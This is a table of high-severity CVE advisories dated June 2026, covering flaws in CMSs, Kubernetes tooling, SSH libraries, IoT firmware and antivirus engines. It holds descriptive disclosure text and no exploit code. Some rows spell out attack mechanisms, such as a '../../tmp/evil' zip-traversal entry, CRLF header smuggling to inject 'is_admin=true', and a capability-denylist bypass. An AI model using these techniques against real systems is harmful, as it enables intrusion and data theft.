| bludit--bludit | Bludit is a content management system. Versions prior to 3.22.0 have a Broken Access Control flaw where active sessions remain valid even after the corresponding user account has been physically deleted from the database. This "Ghost Session" allows revoked users to maintain full unauthorized access to the system. Version 3.22.0 fixes the issue. | 2026-06-08 | 8.8 | CVE-2026-46656 |
| bludit--bludit | Bludit is a content management system. Versions prior to 3.22.0 have a vulnerability in the user management logic that allows deactivated accounts to maintain access via persistent authentication tokens. When an administrator disables a user account, the application fails to invalidate or clear the associated tokenAuth and tokenRemember fields in the JSON database. Consequently, any user with a pre-existing "Remember Me" cookie can bypass the account disablement and maintain a valid authenticated state. Version 3.22.0 patches the issue. | 2026-06-08 | 7.1 | CVE-2026-46657 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite does not restrict the kernel capabilities available inside the container, malicious code can remount the directory in rw mode, thereby gaining write access to that directory. This allows malicious code to perform arbitrary write operations on directories that should be read-only. This issue has been patched in version 0.9.0. | 2026-06-10 | 10 | CVE-2026-46695 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0. | 2026-06-10 | 9.6 | CVE-2026-46703 |
| Brickcom--Cube | Brickcom cameras ship with default credentials that allows any unauthenticated remote attacker to silently access camera feeds. | 2026-06-11 | 7.7 | CVE-2026-50005 |
| Brickcom--Cube | Brickcom cameras allow unauthenticated access to live snapshot images via the /ONVIF endpoint and no authentication is required to retrieve still images from the camera feed. | 2026-06-11 | 7.7 | CVE-2026-50245 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains an insecure direct object reference vulnerability in the messages REST API that allows authenticated attackers to access arbitrary private message threads by supplying a user_id parameter in the request. Attackers can pass another user's identifier to the get_item_permissions_check method, which validates the supplied user_id instead of the logged-in user and is reused by the update and delete handlers, to read, reply to, or delete any user's private messages. | 2026-06-09 | 8.1 | CVE-2026-53673 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains a regular expression injection vulnerability in the activity mention resolver that, when username compatibility mode is enabled, allows attackers to manipulate a REGEXP database clause by crafting mention names containing regex metacharacters. Attackers can submit @mentions whose metacharacters pass through esc_sql unescaped and are inserted into an unprepared REGEXP query against the users table, enabling boolean-based inference of usernames and denial of service through catastrophic backtracking. | 2026-06-09 | 7.1 | CVE-2026-53674 |
| Cap-go--Cap-go | Cap-go prior to 12.128.2 contains an account takeover vulnerability in its email change mechanism that allows an attacker with temporary authenticated session access to change the registered email address without re-authentication such as password or MFA verification. Attackers can redirect verification to an attacker-controlled email address and subsequently perform a password reset to permanently take over the victim's account. | 2026-06-12 | 7.6 | CVE-2026-53981 |
| Capgo--Capgo | Capgo before 12.128.2 contains a denial of service vulnerability allowing attackers to register accounts using arbitrary email addresses without verification, then initiate deletion to lock emails in pending deletion state. Attackers can permanently lock legitimate users out of the platform for 30 days by exploiting unverified email ownership in account lifecycle operations. | 2026-06-12 | 7.5 | CVE-2026-53868 |
| Cellopoint--CelloOS | The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope. | 2026-06-12 | 8.8 | CVE-2026-12059 |
| checkpoint--Identity Agent | A local privilege escalation vulnerability exists in Check Point Identity Agent Full for Windows OS. An authenticated local user may be able to execute arbitrary code with SYSTEM privileges due to improper handling of executable resolution during the log collection process. Successful exploitation could allow an attacker to gain elevated privileges on the affected Windows endpoint. | 2026-06-11 | 7.8 | CVE-2026-10847 |
| checkpoint--Quantum Security Gateway | A weakness in the certificate validation logic of the deprecated IKEv1 key exchange may allow an unauthenticated attacker positioned as a man-in-the-middle to bypass certificate validation in VPN site-to-site connections that use certificate-based authentication. Successful exploitation could allow interception or modification of traffic traversing the VPN tunnel. | 2026-06-08 | 7.4 | CVE-2026-50752 |
| Cloud Foundry--UAA | Cloud Foundry UAA incorrectly treated XML encryption to the Service Provider (confidentiality) as a substitute for XML signatures from the Identity Provider (authenticity) in two SAML flows: the OAuth 2.0 SAML2 bearer grant (token endpoint) and browser SSO (ACS) when wantAssertionSigned is set to false. Assertions or responses that were unsigned but contained encrypted content could still be accepted. Encryption uses the SP's public key from published metadata, therefore, any party, not only a trusted IdP, can produce ciphertext UAA can decrypt; successful decryption therefore does not prove the IdP issued the message. Affected versions: Cloud Foundry UAA (uaa_release) 2.0.0 through 78.13.0. Cloud Foundry CF Deployment all versions through 56.1.0. | 2026-06-11 | 9 | CVE-2026-41005 |
| code-projects--Online Music Site | A vulnerability was found in code-projects Online Music Site 1.0. This vulnerability affects unknown code of the file /Administrator/PHP/AdminDeleteAlbum.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-06-08 | 7.3 | CVE-2026-11489 |
| code-projects--Online Music Site | A vulnerability was determined in code-projects Online Music Site 1.0. This issue affects some unknown processing of the file /Frontend/Search.php. This manipulation of the argument Category causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 7.3 | CVE-2026-11490 |
| code-projects--Simple Flight Ticket Booking System | A vulnerability has been found in code-projects Simple Flight Ticket Booking System 1.0. This affects an unknown part of the file checkUser.php of the component POST Parameter Handler. The manipulation of the argument Username leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 7.3 | CVE-2026-11488 |
| code16--sharp | Sharp is a content management framework built for Laravel as a package. Prior to version 9.22.0, Sharp exposes a generic download endpoint that authorizes access only to the supplied Sharp entity instance, but then reads the target storage disk and path from request parameters. Because the requested storage object is not bound to the authorized entity instance, an authenticated Sharp user who can view one valid record may use that record as an authorization anchor to download unrelated disk-relative objects from configured Laravel Storage disks. The confirmed impact is authenticated disclosure of unrelated objects from configured Laravel Storage disks. This issue does not imply arbitrary host filesystem access outside configured Laravel Storage disk roots. This issue has been patched in version 9.22.0. | 2026-06-10 | 7.7 | CVE-2026-44692 |
| CodeAstro--Student Attendance Management System | A flaw has been found in CodeAstro Student Attendance Management System 1.0. The impacted element is an unknown function of the file /attendance-php/index.php. Executing a manipulation of the argument Username can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2026-06-08 | 7.3 | CVE-2026-11582 |
| Comma AI--Openpilot | A vulnerability was found in Comma AI Openpilot 0.11. This issue affects the function pickle.load/pickle.loads of the file selfdrive/modeld/modeld.py of the component Pickle Module. The manipulation results in deserialization. The attack is only possible with local access. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 7.8 | CVE-2026-12191 |
| commenthol--md-fileserver | md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application's Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML-including <script> tags-is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3. | 2026-06-09 | 7.2 | CVE-2026-46492 |
| contrid--Newsletters | The Newsletters plugin for WordPress is vulnerable to time-based SQL Injection via the 'wpmlsubscriber_id' parameter in all versions up to, and including, 4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-10 | 7.5 | CVE-2026-3018 |
| creativethemeshq--Blocksy | The Blocksy theme for WordPress is vulnerable to PHP Object Injection leading to Remote Code Execution via the 'blocksy_meta' REST API field and the V200 database migration in versions up to and including 2.1.35. This is due to insufficient input sanitization in the blocksy_sanitize_post_meta_options() function, which only blocks values containing '<' or '>' and does not prevent serialized PHP object strings from being stored in post meta, combined with the SearchReplacer::run_recursively() function unconditionally deserializing all string values via @unserialize() during migration without restricting allowed classes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a serialized Blocksy\RaiiPattern object into post meta that, when the V200 migration runs on an upgraded site, is deserialized and triggers RaiiPattern::__destruct(), which executes arbitrary PHP callables via call_user_func(). | 2026-06-09 | 8.8 | CVE-2026-8365 |
| D-Link--DCS-935L | A security vulnerability has been detected in D-Link DCS-935L 1.10.01. This issue affects the function snprintf of the file /web/cgi-bin/greece/rhea of the component HTTP Handler. Such manipulation of the argument data leads to format string. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-13 | 8.8 | CVE-2026-12174 |
| Dana Powers--kafka-python | kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in the protocol parser that allows a malicious broker or machine-in-the-middle attacker to exhaust memory or hang connections by sending a crafted 4-byte frame length value without bounds validation. Attackers can send a specially crafted frame length through the receive_bytes() function to trigger either a multi-gigabyte memory allocation or an uncaught ValueError that leaves the connection in a broken state, causing requests to hang and consumers to stop heartbeating until restart. | 2026-06-10 | 7.5 | CVE-2026-10142 |
| Dana Powers--kafka-python | kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in SCRAM authentication handling that allows a malicious or machine-in-the-middle broker to freeze the client event loop by supplying an excessively large iteration count. In scram.py, ScramClient.process_server_first_message() passes the broker-controlled SCRAM iteration count directly to hashlib.pbkdf2_hmac() without validation, blocking producer sends, consumer polls, admin operations, and heartbeats, which can cause consumer group eviction and repeated reconnect failures. | 2026-06-10 | 7.5 | CVE-2026-10143 |
| davidanderson--UpdraftPlus: WP Backup & Migration Plugin | The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.26.4 via the UpdraftPlus_Remote_Communications_V2::wp_loaded function. This is due to insufficient validation of the remote communications message format, where signature verification can be bypassed and unchecked decryption return values collapse to a predictable all-zero encryption key. This makes it possible for unauthenticated attackers to forge arbitrary RPC commands and run them as the connected administrator, such as uploading and activating a malicious plugin, which ultimately leads to remote code execution. | 2026-06-11 | 8.1 | CVE-2026-10795 |
| debevv--nanoMODBUS | nanoMODBUS through v1.23.0 contains an off-by-one buffer overflow in the recv_msg_header() function of the Modbus/TCP server that allows remote unauthenticated attackers to write one attacker-controlled byte past the end of the 260-byte receive buffer by sending a crafted MBAP frame whose Length field is set to 255. The overflow corrupts the adjacent buffer-index field of the nanoMODBUS state structure, resulting in denial of service through invalid memory accesses and, on bare-metal and RTOS targets without memory protection, one-byte information disclosure and writes to unintended register addresses on the Write Multiple Registers (FC16) handler path. | 2026-06-14 | 8.6 | CVE-2026-54410 |
| degit--degit | Versions of the package degit before 2.8.6, from 3.0.0 and before 3.3.1 are vulnerable to Command Injection due to improper sanitisation of user input for git shell commands directly invoked with exec() method by _cloneWithGit() and fetchRefs() functions. An attacker can execute arbitrary operating system commands as the process user by supplying a specially crafted git repository name. | 2026-06-09 | 8.8 | CVE-2026-11572 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, chat events for public category channels are published to MessageBus without permission scoping, so any MessageBus subscriber without chat enabled could receive chat message payloads in real time. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 7.5 | CVE-2026-44786 |
| driftregion--iso14229 | driftregion iso14229 through 0.9.0 contains an integer underflow and downstream out-of-bounds read in the Handle_0x27_SecurityAccess() function in iso14229.c that allows a remote unauthenticated attacker to crash a UDS server and potentially read memory past the receive buffer by sending a single-byte 0x27 SecurityAccess request that follows any earlier well-formed 0x27 message. The handler reads the SecurityAccess subFunction from recv_buf[1] without first checking that recv_len is at least 2, then computes the key-data length as the unsigned subtraction (uint16_t)(recv_len - UDS_0X27_REQ_BASE_LEN); when recv_len equals 1 the result underflows to 65535 and is passed as args.len to the application's SecAccessValidateKey or SecAccessRequestSeed callback, which typically iterates or copies that many bytes from the 4-KB receive buffer. Every other UDS sub-function handler in the library (0x10, 0x11, 0x14, 0x19, 0x22, 0x23, 0x28, and others) performs an explicit recv_len lower-bound check before indexing; Handle_0x27_SecurityAccess is the sole outlier. The vulnerable handler reaches over CAN bus, OBD-II, ISO-TP, and DoIP transports and is exposed in the default diagnostic session without prior authentication; deployments on automotive ECUs, industrial controllers, and IoT devices that ship iso14229 as their UDS server are affected. | 2026-06-14 | 8.2 | CVE-2026-54413 |
| DTStack--Taier | A vulnerability was determined in DTStack Taier up to 1.4.0. The affected element is the function preHandle of the file taier-data-develop/src/main/java/com/dtstack/taier/develop/interceptor/LoginInterceptor.java of the component Source Connection Test Endpoint. Executing a manipulation can lead to improper authentication. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This patch is called f95389e7f74acec42bcee079a616aaa06f9551d2. A patch should be applied to remediate this issue. | 2026-06-09 | 7.3 | CVE-2026-11618 |
| emarket-design--Customer Support Ticket System & Helpdesk | The WP Ticket plugin for WordPress is vulnerable to SQL Injection via the WordPress search query parameter (`s`) in versions up to, and including, 6.0.4 The plugin hooks WordPress's `posts_request` filter with `wp_ticket_com_posts_request()`, which calls `emd_author_search_results()` when the current request is an unauthenticated front-end search. That function reads `$query->query_vars['s']` - already wp_unslash()'d by `WP_Query::parse_query()`, so wp_magic_quotes protection has been stripped - and concatenates the raw value into a SQL `LIKE` clause inside a UNION sub-SELECT appended to the main query, with no `$wpdb->prepare()` or escaping. This makes it possible for unauthenticated attackers to append additional SQL queries into already-existing queries that can be used to extract sensitive information from the database. | 2026-06-13 | 7.5 | CVE-2026-9848 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.5.4 and 6.0, the esp_tee component exposes secure-service wrappers in esp_secure_services.c and esp_secure_services_iram.c that bridge calls from the user application (i.e. the REE) to TEE-protected hardware peripherals (AES, SHA, ECC, HMAC, SPI, MMU, WDT) and to the security feature like attestation, OTA updates, secure storage. This issue has been patched in versions 5.5.5 and 6.0.1. | 2026-06-10 | 9.3 | CVE-2026-45328 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.5.4 and 6.0, several ESP-TEE secure-service wrappers in esp_secure_services.c and esp_secure_services_iram.c validated only some of the caller-supplied pointer arguments, leaving input pointer arguments unchecked. Because the underlying TEE-protected hardware peripherals (e.g., ECC, SHA, SPI) run in RISC-V machine mode (M-mode) with full address-space access, a caller could supply pointers into TEE-exclusive memory as inputs, causing the peripheral to read TEE memory and return results derived from it to the REE. Depending on the wrapper, the result contains raw bytes from TEE memory, a computed function of TEE memory recoverable through repeated calls, or a single bit per call that forms an oracle for incremental disclosure of TEE-resident sensitive data. This issue has been patched in versions 5.5.5 and 6.0.1. | 2026-06-10 | 7.1 | CVE-2026-45329 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.4, and 6.0, a NULL-pointer dereference exists in the WebSocket subprotocol-negotiation path of the esp_http_server component. While parsing the client-supplied Sec-WebSocket-Protocol request header during the WebSocket handshake, the tokenisation result is dereferenced without a NULL check, so a malformed header value can crash the server before any application-level authentication runs. This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.5, and 6.0.1. | 2026-06-10 | 7.5 | CVE-2026-45541 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.4, and 6.0, a heap buffer overflow exists in the Security Scheme 2 (SRP6a) session-setup path of the protocomm component. The first-phase handler (handle_session_command0() in components/protocomm/src/security/security2.c) trusts the length of a client-supplied protobuf field for the SRP6a username and copies it into a buffer whose size is derived from a narrower destination type. The resulting truncation-versus-copy asymmetry corrupts the heap when an oversized value is supplied. This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.5, and 6.0.1. | 2026-06-10 | 7.1 | CVE-2026-45542 |
| Eugeny--russh | Russh is a Rust SSH client & server library. Prior to version 0.60.3, CryptoVec used unchecked capacity growth, unchecked length arithmetic, and unsafe allocation/locking paths. In current russh releases, local SSH agent peers could still feed attacker-controlled frame lengths into buffer growth before validation. In older russh releases before 0.58.0, remote SSH traffic also reached CryptoVec through transport and compression buffers. This issue has been patched in version 0.60.3. | 2026-06-10 | 7.5 | CVE-2026-46673 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0 to before version 0.61.1, when SSH compression is enabled, russh accepted compressed packets whose on-wire size passed the normal transport packet-length checks but whose decompressed size was much larger. This allowed a remote peer to send oversized post-decompression packets that should have been rejected. In current releases, this is a remote denial-of-service / resource-exhaustion issue in the post-decompression receive path. In older releases before 0.58.0, the same remote decompression path used CryptoVec, which appears to make the historical impact worse. This issue has been patched in version 0.61.1. | 2026-06-10 | 7.5 | CVE-2026-46702 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0 to before version 0.61.0, several russh client and server message handlers decoded attacker-controlled SSH strings, name-lists, and byte fields into owned allocations before applying field-specific bounds. A remote SSH peer could send oversized, high-fanout, or malformed length-prefixed fields and make the library allocate, attempt to allocate, or split data before rejecting input that should have been rejected earlier. This issue has been patched in version 0.61.0. | 2026-06-10 | 7.5 | CVE-2026-48110 |
| EvWill--Product Catalog 8 | Product Catalog 8 1.2 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the selectedCategory parameter. Attackers can submit POST requests to the admin-ajax.php endpoint with the UpdateCategoryList action to extract sensitive database information from WordPress tables. | 2026-06-09 | 8.2 | CVE-2016-20065 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Fedify previously addressed SSRF/internal network access in GHSA-p9cg-vqcc-grcx by adding public URL validation before runtime document and media fetching. However, the IPv4 validation logic present starting in version 0.11.2 and prior to versions 1.9.12, 1.10.11, 2.0.19, 2.1.15, and 2.2.4 appears incomplete. The `validatePublicUrl()` protection relies on `isValidPublicIPv4Address()` to reject non-public IPv4 destinations. The function blocks common private and local ranges such as `10.0.0.0/8`, `127.0.0.0/8`, `169.254.0.0/16`, `172.16.0.0/12`, and `192.168.0.0/16`, but it still treats several special-use, reserved, multicast, benchmarking, and carrier-grade NAT IPv4 ranges as valid public destinations. Because this validation is used as an SSRF defense before outbound fetches, this appears to be an incomplete mitigation or bypass class for the previous SSRF issue. Versions 1.9.12, 1.10.11, 2.0.19, 2.1.15, and 2.2.4 contain an updated patch. | 2026-06-10 | 8.6 | CVE-2026-50131 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.9.11, 1.10.10, 2.0.18, 2.1.14, and 2.2.3, an attacker can make use of JSON-LD features to restructure a JSON-LD document that would change how Fedify interprets it without changing its Linked Data Signature, allowing them to alter a third-party signed activity they have received. Versions 1.9.11, 1.10.10, 2.0.18, 2.1.14, and 2.2.3 fix the issue. | 2026-06-10 | 7 | CVE-2026-42462 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, the Fission router registers an internal-style route - /fission-function/<name> and /fission-function/<ns>/<name> - for every Function object, independent of whether any HTTPTrigger exists for that function. The route was mounted on the same listener as user-defined HTTPTriggers (svc/router, port 8888), so any caller who could reach the router could invoke any function by guessing its metadata.name (and namespace), bypassing the host / path / method / method-allow-list restrictions encoded in HTTPTrigger objects. This issue has been patched in version 1.23.0. | 2026-06-10 | 9.8 | CVE-2026-46614 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the Environment.spec.runtime.podSpec / spec.builder.podSpec passthrough lacked validation, and MergePodSpec propagated dangerous fields into the generated pods. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50545 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's Container Executor path lets a tenant supply Function.spec.podspec directly; the executor merges it into the executor-built podspec and creates a Deployment whose pods run the user's container image. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50563 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's Environment CRD exposes spec.runtime.podSpec and spec.builder.podSpec, which are merged into the Kubernetes pod specs for runtime and builder pods. The merge logic propagated hostNetwork, hostPID, hostIPC, container privileged, and serviceAccountName from the user-supplied podspec with no filtering, and Environment.Validate performed no security-relevant checks on these fields. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50564 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a tenant with environments.fission.io create/update RBAC can run privileged / allowPrivilegeEscalation / dangerous-capability containers in the Fission function or builder namespace, scheduled under the executor's high-privilege service account - enabling container-sandbox escape, host filesystem and network access, and potential node- and cluster-level compromise. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50566 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, the Fission storagesvc component registers archive CRUD handlers (/v1/archive GET / POST / DELETE and /v1/archives list) directly on its HTTP router without performing any authentication or authorization. Any caller able to reach the storagesvc ClusterIP - including any other workload in the same Kubernetes cluster - could enumerate archive IDs, download archives belonging to other tenants, upload arbitrary archive content, and delete archives. This issue has been patched in version 1.23.0. | 2026-06-10 | 8.8 | CVE-2026-46612 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the Fission Function admission webhook (pkg/webhook/function.go) validated that spec.secrets[].namespace and spec.configmaps[].namespace equalled the function's own namespace but performed no equivalent check on spec.environment.namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 8.5 | CVE-2026-49824 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, Fission added PodSpec safety validation for tenant-facing Environment and Function CRDs (ValidatePodSpecSafety / ValidateContainerSafety admission webhook + sanitizeContainerSecurityContext executor merge layer), but the capability check was implemented as a fixed denylist of six Linux capabilities (SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE). The denylist omitted CAP_SYS_TIME, among others. As a result, a tenant who could create a Function or Environment CRD could request securityContext.capabilities.add: ["SYS_TIME"], pass Fission's admission validation and merge-layer sanitization, and run attacker-controlled code with CAP_SYS_TIME in the resulting function or runtime container. This issue has been patched in version 1.25.0. | 2026-06-10 | 8.5 | CVE-2026-50570 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's buildermgr controller processed Package CRDs without verifying that Package.spec.environment.namespace matched Package.metadata.namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49821 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a low-privilege developer who could create a KubernetesWatchTrigger (KWT) in their own namespace was able to establish a persistent surveillance channel over any other namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49822 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a Fission Function spec carries three reference types - Secret, ConfigMap, and Package. The first two were namespace-validated by the admission webhook; PackageRef.Namespace was not. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49823 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, Unarchive in pkg/utils/zip.go joined each archive entry name with the destination directory via filepath.Join and wrote the result without checking whether the resolved path stayed under the destination. A zip entry named ../../tmp/evil therefore landed at /tmp/evil. An attacker who could control a Package.Spec.Source.URL or Deployment.URL archive could induce the fetcher (running as the per-environment pod's fission-fetcher sidecar) to write files anywhere that process could reach: into other tenants' /packages/<ns>/ directories, into mounted secret/config volumes, or into the fetcher's own binary. This issue has been patched in version 1.25.0. | 2026-06-10 | 7.7 | CVE-2026-50567 |
| Flux159--mcp-server-kubernetes | mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.6.0, mcp-server-kubernetes exposes three environment variables (ALLOW_ONLY_READONLY_TOOLS, ALLOW_ONLY_NON_DESTRUCTIVE_TOOLS, ALLOWED_TOOLS) documented as access controls for restricting which Kubernetes operations are available. These controls are enforced at the tool discovery layer (tools/list) but not at the execution layer (tools/call). Any client that knows a tool name can invoke it directly regardless of the configured restriction mode. The access control was effectively cosmetic. This issue has been patched in version 3.6.0. | 2026-06-11 | 8.8 | CVE-2026-46519 |
| foliovision--FV Flowplayer Video Player | The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the comment text in all versions up to, and including, 7.5.49.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires an administrator to have enabled the non-default 'Parse Vimeo and YouTube links' (parse_comments) plugin setting, and requires a submitted comment to be approved by an administrator before the payload is publicly delivered. | 2026-06-09 | 7.2 | CVE-2026-7556 |
| form-data--form-data | form-data is a library for creating readable multipart/form-data streams. In versions through 4.0.5, the `field` argument to `FormData#append` and the `filename` option are concatenated verbatim into the `Content-Disposition` header without escaping carriage return (CR), line feed (LF), or double-quote (") characters. An application that passes attacker-controlled data as a field name or filename (for example, an API gateway that turns JSON object keys into multipart field names) allows the attacker to terminate the header line and inject additional headers, or to smuggle entire additional multipart parts, into the request the application forwards to a backend. This can let the attacker add or override form fields (e.g. set `is_admin=true`) seen by the downstream parser. This is an instance of CWE-93 (CRLF injection). The fix escapes CR, LF, and `"` as `%0D`, `%0A`, and `%22` in field names and filenames, matching the serialization browsers use per the WHATWG HTML multipart/form-data encoding algorithm. Exploitation requires the consuming application to use untrusted input as a field name or filename; applications that use only fixed/trusted field names are not affected. Fixed in 2.5.6, 3.0.5, and 4.0.6. | 2026-06-12 | 7.5 | CVE-2026-12143 |
| Fortinet--FortiSandbox | A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests | 2026-06-09 | 9.1 | CVE-2026-25089 |
| GALAYOU--Y4 | A vulnerability was determined in GALAYOU Y4 1.0.0. Impacted is an unknown function of the component Web Server. This manipulation causes buffer overflow. The attack is only possible within the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 8.8 | CVE-2026-12192 |
| garlic-signage--garlic-hub | Garlic-Hub manages digital signage network - devices, content, and playlists - from a single self-hosted interface. Prior to version 1.1, authenticated users can cause the server to issue arbitrary HTTP requests to internal services via the uploadFromUrl endpoint. This allows internal port scanning, service fingerprinting, and retrieval of internal HTTP responses which are stored in the publicly accessible media pool. This issue has been patched in version 1.1. | 2026-06-11 | 7.7 | CVE-2026-47170 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds write vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25040308. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7004 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed Windows PE file with .NET metadata may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021310. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7008 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021310. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7009 |
